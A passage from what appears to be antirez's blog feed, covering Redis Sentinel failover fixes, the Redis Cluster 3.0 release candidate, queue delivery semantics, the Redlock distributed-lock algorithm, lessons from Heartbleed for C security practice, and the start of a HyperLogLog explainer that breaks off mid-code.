However in the majority partition, A B C can exchange messages, and A is elected master.
Later A restarts, resetting its offset. B and C replicate from it, starting again with lower offsets.
After some time A fails, and, at the same time, E rejoins the majority partition.

E has a data set that is less up to date compared to the B and C data sets, but its replication offset is higher. Not just that: E can actually claim it was recently connected to its master.

Improving upon this is easy. Each Redis instance has a “runid”, a unique ID that changes for each new Redis run. This is useful in partial resynchronizations, in order to avoid getting an incremental stream from a wrong master. Slaves should publish the last master run id they successfully replicated from, and the Sentinel failover should make sure to only pick slaves that replicated from the master they are actually failing over.

Once you tie the replication offset to a given runid, what you get is an *absolute* meter of how up to date a slave is. If two slaves are available, and both can claim continuity with the old master, the one with the higher replication offset is guaranteed to be the best pick.
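A minimal sketch of the resulting selection rule (the field names here are hypothetical, not Sentinel’s actual internals):

def pick_slave(slaves, failed_master_runid, down_after):
    candidates = [
        s for s in slaves
        if s.synced_since_restart                       # rule 1: full sync done after restart
        and s.link_down_time <= 10 * down_after         # rule 2: not disconnected for too long
        and s.last_master_runid == failed_master_runid  # the proposed runid continuity check
    ]
    # among the viable slaves, the highest offset is the most up to date copy
    return max(candidates, key=lambda s: s.repl_offset, default=None)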

However this also creates availability concerns in all the cases where data is not very important but availability is. For example, if when A crashes only E is available, even though it used to replicate from D, it is still better than nothing. I would say that when you need a highly available cache and consistency is not a big issue, using a Redis cluster à la memcached (client-side consistent hashing among N masters) is the way to go.

Note that even without checking the runid, making the replication offsets durable across restarts already improves the behavior considerably. In the above example, E would be picked only if, while isolated in the minority partition together with the old master, it received more writes than the other slaves in the majority side.

TLDR: we have to fix this. It is not related to restarting masters without a data set, but it is useful to have a more correct implementation. However this will only address a class of very-hard-to-trigger issues.

This has been on my TODO list for some time now, and congrats to Aphyr for identifying a real implementation issue in a matter of a few exchanged tweets. About the failure reported by Aphyr from the unknown company: I don’t think it is currently viable to try to protect against serious misconfigurations. However, it is a clear sign that we need better Sentinel docs, more incremental compared to the ones we have now, which try to describe how the system works. A wiser approach could be to start with a common sane configuration, plus a “don’t do” list like: don’t turn persistence off, unless you are ok with wiped instances.
http://antirez.com/news/80
Redis cluster, no longer vaporware. http://antirez.com/news/79 http://antirez.com/news/79 Thu, 09 Oct 2014 14:35:23 +0000
Basically it is a roughly 4 year old project: about two thirds of the whole history of Redis. Yet it is only today that I’m releasing the first Release Candidate of Redis 3.0.0, the first version with Cluster support.

An erratic run


Understanding why it took so long is straightforward: I started the cluster project in a rush, at a moment when it looked like Redis was going to be totally useless without an automatic way to scale.
It was not the right moment to start the Cluster project, simply because Redis itself was too immature, so we didn’t yet have a solid “single instance” story to tell.

While I made the error of starting a project with the wrong timing, at least I didn’t fall into the trap of ignoring the requests arriving from the community, so the project was stopped and restarted an infinite number of times in order to provide more bandwidth to other fundamental features. Persistence, replication, latency and introspection received a lot more care than cluster, simply because they were more important for the user base.

Another limit of the project was that, when I started it, I had no clue whatsoever about distributed programming. I made a first design that was horrible, and that managed to capture well only the “product” requirements: low latency, linear scalability and small overhead for small clusters. However all the details were wrong, it was far more complex than it had to be, the algorithms used were unsafe, and so forth.

While I was making small progress, I started to study the basics of distributed programming, redesigned Redis Cluster, and applied the same ideas to the new version of Sentinel. The distributed algorithms used by both systems are still primitive, since they are asynchronously replicated, eventually consistent systems, so I had no need to deal with consensus and other non-trivial problems. However, even when you are addressing a simple problem, compared to writing a CP store at least, you need to understand what you are doing, otherwise the resulting system can be totally wrong.

Despite all these problems, I continued to work on the project, trying to fix it, fix the implementation, and bring it to maturity, because there was this simple fact, like an elephant in a small room, permeating the whole Redis community: people were doing again and again, with their own efforts, and many times in a totally broken way, two things:

1) Sharding the dataset among N nodes.
2) A responsive failover procedure in order to survive certain failures.

Problem “2” was so bad that at some point I decided to start the Redis Sentinel project before Cluster was finished, in order to provide an HA system ASAP, and one more suitable than Redis Cluster for the majority of use cases that required just “2” and not “1”.

Finally I’m starting to see the first real-world results of these efforts, and now we have a release candidate, which is the fundamental milestone required to get adoption, fix the remaining bugs, and improve the system in a more incremental way.

What does it actually do?


Redis Cluster is basically a data sharding strategy, with the ability to reshard keys from one node to another while the cluster is running, together with a failover procedure that makes sure the system is able to survive certain kinds of failures.
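For reference, the sharding unit is the hash slot, and the key-to-slot mapping documented in the Redis Cluster specification is simply the following (sketched in Python; the crc16() helper, implementing the CRC16 variant the spec mandates, is assumed, and hash tags are ignored here):

def key_slot(key: bytes) -> int:
    # 16384 hash slots, each served by exactly one master at a time
    return crc16(key) % 16384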

From the point of view of distributed databases, Redis Cluster provides a limited amount of availability during partitions, and a weak form of consistency: basically it is neither a CP nor an AP system. In other words, Redis Cluster gives up reaching the theoretical limits of what is possible with distributed systems in order to gain certain real-world properties.

The consistency model is the famous “eventual consistency” model. Basically if nodes get desynchronized because of partitions, it is guaranteed that when the partition heals, all the nodes serving a given key will agree about its value.

However the merge strategy is “last failover wins”, so writes received during network partitions can be lost. A common example is what happens when a master is partitioned into a minority partition with clients still trying to write to it. If, when the partition heals, a slave has been promoted in the majority side to replace this master, the writes received by the old master are lost.

This in turn means that Redis Cluster does not have to keep meta data inside the data structures in order to attempt a value merge, and that the fancy commands and data structures supported by Redis are also supported by Redis Cluster. So: no additional memory overhead, no API limits, no limits on the number of elements a value can contain, but less safety during partitions.

It is trivial to understand that in a system designed like Redis Cluster, diverging nodes are not good, so the system tries to mitigate its shortcomings by limiting the probability of two nodes diverging (and the amount of divergence). This is achieved in a few ways:

1) The minority side of a partition becomes not available.
2) The replication is designed so that usually the reply to the client, and the replication stream to slaves, is sent at the same time.
3) When multiple slaves are available to failover a master, the system will try to pick the one that appears to be less diverging from the failed master.

These strategies don’t change the theoretical properties of the system, but they add some more real-world protection against common Redis Cluster failure modes.

For the Redis API and use cases, I believe this design makes sense, but in the past many disagreed. However, my opinion is that each designer is free to design a system as she or he wishes; there is just one rule: tell the truth. So Redis Cluster documents its limits and failure modes clearly in the official documentation.

It’s the user, and the use case at hand, that will make a system useful or not. My feeling is that for six years users continued to use Redis even without any clustering support at all, because their use cases made this possible, and because Redis offers certain specific features and performance that make it very suitable to address certain problems. My hope is that Redis Cluster will improve the life of many of those users.

The road ahead


Finally we have a minimum viable product to ship, stable enough for users to seriously start testing, and in certain cases to adopt already. The more the adoption, the more we improve it. I know this from Redis and Sentinel: now begins the incremental process that moves a piece of software from usable to mature. Listening to users, fixing bugs, covering more code with tests, …

At the same time, I’m starting to think about the next version of Redis Cluster, improving v1 with many useful things that were not possible to add right now, like multi data center support, more write safety in the minority partition using command replays, automatic node balancing (right now you have to reshard manually if certain nodes are too empty and others too full), and many more things.

Moreover, I believe Redis Cluster could benefit from a special execution mode specifically designed for caching, where nodes accept writes for hash slots they are not in charge of, in order to stay available in a minority partition.

There is always time to improve and fix our implementations and designs, but focusing too much on how we would like a piece of software to be has the risk of keeping it in the vaporware category for far longer than needed. It’s time to let it go. Enjoy Redis Cluster!

Redis Cluster RC1 is available both as the '3.0.0-rc1' tag at Github and as a tarball on the Redis.io download page at http://redis.io/download
http://antirez.com/news/79
Queues and databases http://antirez.com/news/78 http://antirez.com/news/78 Mon, 14 Jul 2014 09:53:34 +0000
Technically speaking we can think of queues as a form of inter-process messaging primitive, where the receiving process needs to acknowledge the reception of the message. Messages cannot be fire-and-forget, since the queue needs to know whether a message can be removed from the queue, so some form of acknowledgement is strictly required.

When receiving a message triggers the execution of a task, as it happens in the kind of queues we are talking about, the moment the reception is acknowledged changes the semantics of the queue. If the worker process acknowledges the reception *before* processing the message, and the worker fails, the message can be lost before the task is performed at all. If the acknowledgement is sent only *after* the message is processed, a worker failure or a network partition may cause the queue to re-deliver the message. This happens whatever the queue consistency properties are, so even if the queue is modeled using a system providing strong consistency, the indetermination still holds true:

* If messages are acknowledged before processing, the queue will have an at-most-once delivery property. This means messages can be processed zero or one time.
* If messages are acknowledged after processing, the queue will have an at-least-once delivery property. This means messages can be processed one or more times, with no upper bound.

While neither case is perfect, in the real world the second behavior is often preferred, since it is usually much simpler to cope with multiple deliveries of a message (triggering multiple executions of the task) than with a system that from time to time does not execute a given task at all. An example of an at-least-once delivery system is Amazon SQS (Simple Queue Service).
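
To make the two semantics concrete, here is a minimal sketch of the two worker loops using the redis-py client (an assumption on my part; the key names are made up, and the recovery of stale entries in the "processing" list is left out):

import redis  # assuming the redis-py client

r = redis.Redis()

def process_task(msg):
    print("processing", msg)  # placeholder for the real work

def worker_at_most_once():
    # Ack-before-processing: LPOP removes the message immediately, so
    # a crash inside process_task() means the task is never performed.
    msg = r.lpop("tasks")
    if msg is not None:
        process_task(msg)

def worker_at_least_once():
    # Ack-after-processing: the message is atomically moved to a
    # "processing" list and deleted only once the task completed, so a
    # crash leads to re-delivery (and possibly multiple executions).
    msg = r.rpoplpush("tasks", "processing")
    if msg is not None:
        process_task(msg)
        r.lrem("processing", 1, msg)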

There is also a fundamental reason, related to distributed systems, why at-least-once delivery systems are to be preferred: the other semantics (at-most-once delivery) requires the queue to be strongly consistent, since once a message is acknowledged no other worker must be able to acknowledge the same message, which is a strong property.

Once we move our focus to at-least-once delivery systems, we may notice that modeling the queue with a CP system is wasteful, and even a disadvantage:

* We can’t guarantee more than at-least-once delivery anyway.
* Our queue loses the ability to work in the minority side of a network partition.
* Because of the consistency requirements the queue needs agreement among nodes, so we are sacrificing performance and adding latency without any good reason.

Since messages may be delivered multiple times, what we want conceptually is a commutative data structure and an eventually consistent system. Messages can be stored in a set data structure replicated across N nodes, with the merge function being the union of the sets. Acknowledgements, sent by workers after executing messages, are also conceptually elements of the set, marking a given element as processed. This is a trivial model, not particularly practical for a real world system, but it shows how a given kind of queue is well matched by a given set of properties of a distributed system; a minimal sketch follows.
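
A toy sketch of that conceptual model (the class and method names are mine, purely for illustration, not part of any real system):

class QueueReplica:
    def __init__(self):
        self.messages = set()   # elements: (msg_id, payload) pairs
        self.acks = set()       # elements: msg_id of processed messages

    def add(self, msg_id, payload):
        self.messages.add((msg_id, payload))

    def ack(self, msg_id):
        self.acks.add(msg_id)

    def merge(self, other):
        # Union is commutative, associative and idempotent: replicas
        # converge no matter how many times or in what order we merge.
        self.messages |= other.messages
        self.acks |= other.acks

    def pending(self):
        return [(i, p) for (i, p) in self.messages if i not in self.acks]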

Practically speaking there are other useful things our queue may try to provide:

* Guaranteed delivery to a single worker at least for a window of time: while multiple delivery is allowed, we want to avoid it as much as possible.
* Best-effort checks to avoid re-delivering a message after a timeout if it was already processed. We can’t guarantee this property, but we can try hard to reduce re-issuing messages that were actually already processed.
* Enough internal state to handle, during normal operations, messages as a FIFO, so that messages arriving first are processed first.
* Auto cleanup of the internal data structures.

On top of this we need to retain messages during network partitions, so that conceptually (even if practically we could use different data structures) the set of messages to deliver is the union of the messages of all the nodes.

Unfortunately, while many Redis based queue implementations exist, none tries to use N independent Redis nodes and the primitives they offer as building blocks for a distributed system with such characteristics. Combining Redis data structures and performance with algorithms providing certain useful guarantees could produce a queue system which is very practical to use, easy to administer and scale, with excellent performance (messages per second) per node.

Because I find the topic interesting and this is an excellent use case for Redis, I’m slowly working on a design for such a Redis based queue system. I hope to show something in the next weeks, time permitting.
http://antirez.com/news/78
A proposal for more reliable locks using Redis http://antirez.com/news/77 http://antirez.com/news/77 Fri, 16 May 2014 11:15:32 +0000 UPDATE: The algorithm is now described in the Redis documentation here => http://redis.io/topics/distlock. The article is left here in its older version; the updates will go into the Redis documentation instead.
-----------------

Many people use Redis to implement distributed locks. Many believe this is a great use case, and that Redis works great to solve an otherwise hard problem. Others believe it is totally broken, unsafe, and the wrong use case for Redis.

Both are right, basically. Distributed locks are not trivial if we want them to be safe while at the same time demanding high availability, so that Redis nodes can go down and clients are still able to acquire and release locks. At the same time a fast lock manager can solve tons of problems which are otherwise hard to solve in practice, and sometimes even a far from perfect solution is better than a very slow one.

Can we have a fast and reliable system at the same time based on Redis? This blog post is an exploration in this area. I’ll try to describe a proposal for a simple algorithm that uses N Redis instances for distributed and reliable locks, in the hope that the community may help me analyze the algorithm and comment on it, to see if it is a valid candidate.

# What do we really want?

Talking about a distributed system without stating the safety and liveness properties we want is mostly useless, because only when those requirements are specified is it possible to check whether a design is correct, and for people to analyze it and find bugs. We are going to model our design with just three properties, which are, I believe, the minimum guarantees needed to use distributed locks effectively.

1) Safety property: Mutual exclusion. At any given moment, only one client can hold a lock.

2) Liveness property A: Deadlock free. Eventually it is always possible to acquire a lock, even if the client that locked a resource crashes or gets partitioned away.

3) Liveness property B: Fault tolerance. As long as the majority of Redis nodes are up, clients are able to acquire and release locks.

# Distributed locks, the naive way.

To understand what we want to improve, let’s analyze the current state of affairs.

The simple way to use Redis to lock a resource is to create a key in an instance. The key is usually created with a limited time to live, using the Redis expires feature, so that eventually it gets released one way or the other (property 2 in our list). When the client needs to release the resource, it deletes the key.

Superficially this works well, but there is a problem: it is a single point of failure in our architecture. What happens if the Redis master goes down?
Well, let’s add a slave! And use it if the master is unavailable. This is unfortunately not viable: by doing so we can’t implement our mutual exclusion safety property, because Redis replication is asynchronous.

There is an obvious race condition with this model:

1) Client A acquires the lock into the master.

2) The master crashes before the write to the key is transmitted to the slave.

3) The slave gets promoted to master.

4) Client B acquires the lock to the same resource A already holds a lock for. <- SAFETY VIOLATION!

Sometimes it is perfectly fine that under special circumstances, like during a failure, multiple clients can hold the lock at the same time.
If this is the case, stop reading and enjoy your replication based solution. Otherwise keep reading for a hopefully safer way to implement it.

# First, let’s do it correctly with one instance.

Before trying to overcome the limitations of the single instance setup described above, let’s check how to do it correctly in this simple case, since this is actually a viable solution in applications where an occasional race condition is acceptable, and because locking in a single instance is the foundation of the distributed algorithm described here.

To acquire the lock, the way to go is the following:

SET resource_name my_random_value NX PX 30000

The command will set the key only if it does not already exist (NX option), with an expire of 30000 milliseconds (PX option).
The key is set to the value “my_random_value”. This value must be unique across all clients and all lock requests.

Basically the random value is used in order to release the lock in a safe way, with a script that tells Redis: remove the key only if it exists and the value stored at it is exactly the one I expect. This is accomplished by the following Lua script:

if redis.call("get",KEYS[1]) == ARGV[1] then
return redis.call("del",KEYS[1])
else
return 0
end

This is important in order to avoid removing a lock that was created by another client. For example a client may acquire the lock, get blocked in some operation for longer than the lock validity time (the time at which the key will expire), and later remove a lock that was already acquired by some other client.
Using just DEL is not safe, as a client may remove the lock of another client. With the above script instead every lock is “signed” with a random string, so the lock will be removed only if it is still the one that was set by the client trying to remove it.

What should this random string be? I assume it’s 20 bytes from /dev/urandom, but you can find cheaper ways to make it unique enough for your task.
For example a safe pick is to seed RC4 with /dev/urandom and generate a pseudo random stream from that.
A simpler solution is to combine the unix time at microsecond resolution with a client ID; it is not as safe, but probably up to the task in most environments.

The time we use as the key time to live is called the “lock validity time”. It is both the auto release time and the time the client has to perform the required operation before another client may be able to acquire the lock again, without technically violating the mutual exclusion guarantee, which is limited to a given window of time from the moment the lock is acquired.

So now we have a good way to acquire and release the lock. Reasoning about a non-distributed system composed of a single, always available instance, the system is safe. Let’s extend the concept to a distributed system where we don’t have such guarantees.

# Distributed version

In the distributed version of the algorithm we assume to have N Redis masters. Those nodes are totally independent, so we don’t use replication or any other implicit coordination system. We already described how to acquire and release the lock safely in a single instance, and we take for granted that the algorithm will use this method in each instance. In our examples we set N=5, which is a reasonable value, so we need to run 5 Redis masters on different computers or virtual machines in order to ensure that they’ll fail in a mostly independent way.

In order to acquire the lock, the client performs the following operations:

Step 1) It gets the current time in milliseconds.

Step 2) It tries to acquire the lock in all the N instances sequentially, using the same key name and random value in all the instances.

During step 2, when setting the lock in each instance, the client uses a timeout which is small compared to the total lock auto-release time.
For example if the auto-release time is 10 seconds, the timeout could be in the ~5-50 milliseconds range.
This prevents the client from remaining blocked for a long time trying to talk with a Redis node which is down: if an instance is not available, we should try to talk with the next instance ASAP.

Step 3) The client computes how much time elapsed while acquiring the lock, by subtracting the timestamp obtained in step 1 from the current time.
If and only if the client was able to acquire the lock in the majority of the instances (at least 3), and the total time elapsed to acquire the lock is less than lock validity time, the lock is considered to be acquired.

Step 4) If the lock was acquired, its validity time is considered to be the initial validity time minus the time elapsed, as computed in step 3.

Step 5) If the client failed to acquire the lock for some reason (either it was not able to lock N/2+1 instances, or the validity time is negative), it will try to unlock all the instances (even the instances it believes it was not able to lock).
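
The five steps map naturally to code. A minimal sketch, assuming a list of redis-py clients (one per master, each configured with a short socket timeout) and reusing the RELEASE_SCRIPT from the single-instance sketch above; the helper name and the drift constant are mine, not part of the proposal:

import time

def acquire_redlock(servers, resource, token, ttl_ms, drift_ms=2):
    start = time.monotonic()                        # step 1
    locked = 0
    for server in servers:                          # step 2
        try:
            if server.set(resource, token, nx=True, px=ttl_ms):
                locked += 1
        except Exception:
            pass  # unreachable instance: move to the next one ASAP
    elapsed_ms = (time.monotonic() - start) * 1000  # step 3
    validity_ms = ttl_ms - elapsed_ms - drift_ms    # step 4
    if locked >= len(servers) // 2 + 1 and validity_ms > 0:
        return validity_ms  # lock acquired, valid for this long
    for server in servers:                          # step 5
        try:
            server.eval(RELEASE_SCRIPT, 1, resource, token)
        except Exception:
            pass
    return None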

# Synchronous or not?

Basically the algorithm is partially synchronous: it relies on the assumption that, while there is no synchronized clock across the processes, the local time in every process flows at approximately the same rate, with an error which is small compared to the auto-release time of the lock. This assumption closely resembles a real-world computer: every computer has a local clock and we can usually rely on different computers having a clock drift which is small.

Moreover we need to refine our mutual exclusion rule: it is guaranteed only as long as the client holding the lock terminates its work within the lock validity time (as obtained in step 3), minus some time (just a few milliseconds, in order to compensate for clock drift between processes).

# Retry

When a client is not able to acquire the lock, it should try again after a random delay, in order to desynchronize multiple clients trying to acquire the lock for the same resource at the same time (which may result in a split brain condition where nobody wins). Also, the faster a client tries to acquire the lock in the majority of Redis instances, the smaller the window for a split brain condition (and the need for a retry), so ideally the client should try to send the SET commands to the N instances at the same time, using multiplexing.

It is worth stressing how important it is for clients that failed to acquire the majority of locks to release the (partially) acquired locks ASAP, so that there is no need to wait for the keys to expire in order for the lock to be acquired again (however, if a network partition happens and the client is no longer able to communicate with the Redis instances, there is an availability penalty to pay while waiting for the expires).

# Releasing the lock

Releasing the lock is simple: just release it in all the instances, whether or not the client believes it was able to successfully lock a given instance.

# Safety arguments

Is this system safe? We can try to understand what happens in different scenarios.

To start, let’s assume that a client is able to acquire the lock in the majority of instances. All the instances will contain a key with the same time to live. However the keys were set at different times, so they will also expire at different times. But if the first key was set at worst at time T1 (the time we sample before contacting the first server) and the last key was set at worst at time T2 (the time we obtained the reply from the last server), we are sure that the first key to expire will exist for at least MIN_VALIDITY = TTL - (T2-T1) - CLOCK_DRIFT. All the other keys will expire later, so we are sure that the keys will be simultaneously set for at least this time.

During the time the majority of keys are set, another client will not be able to acquire the lock, since N/2+1 SET NX operations can’t succeed if N/2+1 keys already exist. So if a lock was acquired, it is not possible to acquire it again at the same time (which would violate the mutual exclusion property).

However we want to also make sure that multiple clients trying to acquire the lock at the same time can’t simultaneously succeed.

If a client locked the majority of instances using a time near, or greater than, the lock maximum validity time (the TTL we use for SET, basically), it will consider the lock invalid and will unlock the instances, so we only need to consider the case where a client was able to lock the majority of instances in a time which is less than the validity time. In this case, for the argument already expressed above, for MIN_VALIDITY no client should be able to re-acquire the lock. So multiple clients would be able to lock N/2+1 instances at the same time (with “time” being the end of step 2) only when the time to lock the majority was greater than the TTL, making the lock invalid.

Are you able to provide a formal proof of safety, or to find a bug? That would be very appreciated.

# Liveness arguments

The system liveness is based on three main features:

1) The auto release of the lock (since keys expire): eventually keys are available again to be locked.

2) The fact that clients, usually, will cooperate removing the locks when the lock was not acquired, or when the lock was acquired and the work terminated, making it likely that we don’t have to wait for keys to expire to re-acquire the lock.

3) The fact that when a client needs to retry a lock, it waits for a time which is comparably greater than the time needed to acquire the majority of locks, in order to probabilistically make split brain conditions during resource contention unlikely.

However there is at least one scenario where a very special network partition/rejoin pattern, repeated indefinitely, may violate the system availability.
For example with N=5, two clients A and B may try to lock the same resource at the same time; neither is able to acquire the majority of locks, but together they may hold the majority of nodes (for example client A locked 2 instances, client B just one).
Then the clients are partitioned away before they can unlock the locked instances. This leaves the resource not lockable for a time roughly equal to the auto release time. When the keys expire, the two clients A and B rejoin the partition and repeat the same pattern, and so forth indefinitely.

Another point of view on the problem above is that we pay an availability penalty equal to the TTL on network partitions, so if there are continuous partitions, we may pay this penalty indefinitely.

I can’t find a simple way to guarantee liveness (honestly, I did not try very hard), but the worst case appears to be hard to trigger.
Basically it means that we can only provide, using this algorithm, an approximation of Property number 2.

# Performance, crash-recovery and fsync

Many users using Redis as a lock server need high performance in terms of both the latency to acquire and release a lock, and the number of acquire / release operations per second they can perform. In order to meet this requirement, the strategy to talk with the N Redis servers to reduce latency is definitely multiplexing (or poor man’s multiplexing, which is: put the socket in non-blocking mode, send all the commands, and read all the replies later, assuming that the RTT between the client and each instance is similar).

However there is another consideration about persistence, if we want to target a crash-recovery system model.

To see the problem, let’s assume we configure Redis without persistence at all. A client acquires the lock in 3 of 5 instances. One of the instances where the client acquired the lock is restarted: at this point there are again 3 instances that can be locked for the same resource, and another client can lock it, violating the exclusivity safety property.

If we enable AOF persistence, things will improve quite a bit. For example we can upgrade a server by sending SHUTDOWN and restarting it. Because Redis expires are semantically implemented so that virtually the time still elapses when the server is off, all our requirements are fine.
However everything is fine only as long as it is a clean shutdown. What about a power outage? If Redis is configured, as by default, to fsync to disk every second, it is possible that after a restart our key is missing. Long story short, if we want to guarantee lock safety in the face of any kind of instance restart, we need to enable fsync=always in the persistence settings. This in turn will totally ruin performance, down to the level of the CP systems that are traditionally used to implement distributed locks in a safe way.

The good news is that, because in our algorithm we don’t stop acquiring locks as soon as we reach the majority of servers, the actual probability of a safety violation is small: most of the time the lock will be held in all 5 servers, so even if one restarts without the key, it is practically unlikely (but not impossible) that an actual safety violation happens. Long story short, this is a user choice, and a big trade off. Given the small probability of a race condition, if it is acceptable that with an extremely small probability, after a crash-recovery event, the lock may be acquired at the same time by multiple clients, then fsync at every operation can (and should) be avoided.

# Reference implementation

I wrote a simple reference implementation in Ruby, backed by redis-rb, here: http://github.com/antirez/redlock-rb

# Want to help?

If you are into distributed systems, it would be great to have your opinion / analysis.
Also, reference implementations in other languages would be welcome.

Thanks in advance!

EDIT: I received feedback, in the comments of this blog post and via Hacker News, that is worth incorporating here.

1) As Steven Benjamin notes in the comments below, if after restarting an instance we make it unavailable for enough time for all the locks that used it to expire, we don't need fsync. Actually we don't need any persistence at all, so our safety guarantee can be provided with a purely in-memory configuration.

An example: previously we described a race condition where a lock is obtained in 3 servers out of 5, and one of the servers where the lock was obtained restarts empty: another client may acquire the same lock by locking this server and the two that were not locked by the previous client. However if the restarted server is not available for queries for enough time for all the locks obtained with it to expire, we are guaranteed this race is no longer possible.

2) The Hacker News user eurleif noticed that it is possible to reacquire the lock, as a strategy, if the client notices it is taking too much time to complete the operation. This can be done by just extending an existing lock, sending a script that extends the expire of the key if the value stored at it is the expected one. If there are no new partitions, and we try to extend the lock enough in advance so that the keys will not expire, the lock is guaranteed to be extended (a minimal sketch of such a script is shown after this list).

3) The Hacker News user mjb noted that the term "skew" is not correct to describe the difference in the rate at which different clocks increment their local time, and that I'm actually talking about "drift". I'm replacing the word "skew" with "drift" to use the correct term.
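
Here is a minimal sketch of the extension script mentioned in point 2, in the same spirit as the release script above (the Python wrapper assumes the redis-py client; the names are mine):

EXTEND_SCRIPT = """
if redis.call("get", KEYS[1]) == ARGV[1] then
    return redis.call("pexpire", KEYS[1], ARGV[2])
else
    return 0
end
"""

def extend_lock(r, resource, token, ttl_ms):
    # Returns 1 if the lock was still ours and its TTL was extended,
    # 0 if the key expired or now belongs to another client.
    return r.eval(EXTEND_SCRIPT, 1, resource, token, ttl_ms)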

Thanks for the very useful feedback.
http://antirez.com/news/77
Using Heartbleed as a starting point http://antirez.com/news/76 http://antirez.com/news/76 Thu, 10 Apr 2014 09:06:18 +0000
However sometimes in the morning I read the code I wrote the night before and I’m deeply embarrassed. Programmers sometimes fail, I for sure do often, so my guess is that what is needed is a different process, not a different OpenSSL team.

Some propose a different, safer language than C; others argue that the specification is broken because it is too complex. Probably there is some truth in both arguments, however it is unlikely that we move to a different specification or systems language soon, so the real question is: what can we do now to improve system software security?

1) Throw money at it.

Making system code safer is simple if there is investment. If different companies hire security experts to audit the OpenSSL code base, the probability of discovering a bug like heartbleed becomes greater.

I’ve seen very complex bugs, triggered by sets of non-trivial conditions, discovered by serious code auditing efforts. A memcpy() without bounds checks is something that, if you analyze the code security-wise, will stand out on the first read. And guess how heartbleed was discovered? Via security audits performed at Google.

Probably the time to consider open source something that we mostly take from is over. Many companies should follow the example of Google and others, dedicating workforce to OSS software development and security.

2) Static and dynamic checks.

Static code analysis is, as a side effect, a semi-automated way to do code audits.
In critical system code like OpenSSL, even adding some source code annotations or adopting a set of rules to make static analysis more effective is definitely acceptable.

Static tools today are not a total solution, but the output of a static analysis, if carefully inspected by an expert programmer, can provide some value.

Another great help comes from dynamic checks like Valgrind. Every piece of system software written in C should be tested under Valgrind automatically at every new commit.

3) Abstract C with libraries.

C is low level and has no built-in safety in the language. However something good about C is that it allows building layers on top of its rawness.

A sane dynamic string library prevents a lot of buffer overflow issues, and today almost every decent project is using one. However there is more you can do. For example, for security critical code where memory can contain things like private keys, you can augment your dynamic string library with memory copy primitives that only copy from one buffer to the other while performing implicit sanity checks.

Moreover if a buffer contains critical data, you can set logical permissions so that trying to copy from this area aborts the program. There are other, less portable ways to use memory management to protect important memory pages in even more effective ways, however a higher, C-level protection can be much simpler in the real world because of portability / predictability concerns.

In general many things can be explored to avoid using C without protections, creating a library that abstracts on top of it to make programming safer.

4) Randomized tests.

Unit tests are unlikely to trigger edge cases and failed sanity checks.
There is a class of tests, known for decades, that is in my opinion not used enough: fuzz testing.

The OpenSSL bug was definitely discoverable by sending different kinds of OpenSSL packets with different randomized parameters, in conjunction with dynamic analysis tools like Valgrind.

In my experience, a great deal of randomized tests, together with an environment where the same tests are run again and again with the program under Valgrind, can discover a number of real-world bugs that would otherwise go unnoticed. There are many models to explore: usually you want something that injects totally random data, plus intermediate models where valid packets are corrupted in different random ways.

A typical example of this technique is the old DNS compression infinite-loop bug. Throw a few random packets at a naive implementation and you’ll find it in a matter of minutes.

5) Change of mentality about security vs performance.

It is interesting that OpenSSL does its own allocation caching because on some systems malloc/free is slow. This is a sign that performance, even in security critical code, is still regarded with too much respect compared to safety. In this specific instance, it must be admitted that when the OpenSSL developers wrapped malloc, they probably never thought of the security implications. However the fact that they cared about a low-level detail like the allocation functions on *some* systems is a sign of deep concern about performance, while they should be more deeply concerned about the correctness and safety of the system.

In general it does not help that the system that is the de facto standard in today’s server infrastructure, that is, Linux, has had, and still has, one of the worst allocators you will find around, mostly for licensing concerns, since the better allocators are not GPL but BSD licensed.

This is probably yet another area where big corps should contribute, by providing significant improvements to glibc malloc. Glibc malloc is, even if better alternatives are available, what much real-world system software is going to use anyway.

I would love to see the discussion about heartbleed take a more pragmatic approach, because one thing is guaranteed: assigning blame here or there will not change the actual level of security of OpenSSL or anything else, and there are new challenges ahead. For example the implementation of HTTP/2.0 may be a very delicate moment, security wise.

EDIT: Actually I was not right: the malloc implementation inside glibc is BSD licensed, so it is not a license issue. I don't know why glibc is not using jemalloc instead, which is a very good and actively developed allocator.
http://antirez.com/news/76
Redis new data structure: the HyperLogLog http://antirez.com/news/75 http://antirez.com/news/75 Tue, 01 Apr 2014 08:16:35 +0000
Counting unique things
===

Usually counting unique things, for example the number of unique IPs that connected today to your web site, or the number of unique searches that your users performed, requires remembering all the unique elements encountered so far, in order to match each new element against the set of already seen elements, and increment a counter only if the new element was never seen before.

This requires an amount of memory proportional to the cardinality (number of items) of the set we are counting, which is often absolutely prohibitive.

There is a class of algorithms that use randomization in order to provide an approximation of the number of unique elements in a set using just a constant, and small, amount of memory. The best of such algorithms currently known is called HyperLogLog, and is due to Philippe Flajolet.

HyperLogLog is remarkable as it provides a very good approximation of the cardinality of a set even using a very small amount of memory. In the Redis implementation it only uses 12kbytes per key to count with a standard error of 0.81%, and there is no limit to the number of items you can count, unless you approach 2^64 items (which seems quite unlikely).

The algorithm is documented in the original paper [1], and its practical implementation and variants were covered in depth by a 2013 paper from Google [2].

[1] http://algo.inria.fr/flajolet/Publications/FlFuGaMe07.pdf
[2] http://static.googleusercontent.com/media/research.google.com/en//pubs/archive/40671.pdf

How does it work?
===

There are plenty of wonderful resources to learn more about HyperLogLog, such as [3].

[3] http://blog.aggregateknowledge.com/2012/10/25/sketch-of-the-day-hyperloglog-cornerstone-of-a-big-data-infrastructure/

Here I’ll cover only the basic idea, using a very clever example found at [3]. Imagine you tell me you spent your day flipping a coin, counting the longest uninterrupted run of heads you encountered. If you tell me that the maximum run was 3 heads, I can imagine that you did not flip the coin a lot of times. If instead your longest run was 13, you probably spent a lot of time flipping the coin.

However if you get lucky and get 10 heads the first time, an event that is unlikely but possible, and then stop flipping your coin, I’ll provide a very wrong approximation of the time you spent flipping. So I may ask you to repeat the experiment, but this time using 10 coins and 10 different pieces of paper, one per coin, where you record the longest run of heads. Since I can observe more data, my estimation will be better.

Long story short this is what HyperLogLog does: it hashes every new element you observe. Part of the hash is used to index a register (the coin+paper pair, in our previous example; basically we are splitting the original set into m subsets). The other part of the hash is used to count the longest run of leading zeroes in the hash (our run of heads). The probability of a run of N+1 zeroes is half the probability of a run of length N, so by observing the values of the different registers, each set to the maximum run of zeroes observed so far for its subset, HyperLogLog is able to provide a very good approximation of the cardinality.
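
A toy sketch of the update step, just to make the idea concrete (a plain list of registers and SHA1 as the hash are my illustrative choices, not what Redis actually uses):

import hashlib

M = 16384  # number of registers, 2^14

def hll_add(registers, element):
    # `registers` is a list of M small integers; `element` is bytes.
    # The real implementation packs the registers as 6-bit fields.
    h = int.from_bytes(hashlib.sha1(element).digest()[:8], "little")
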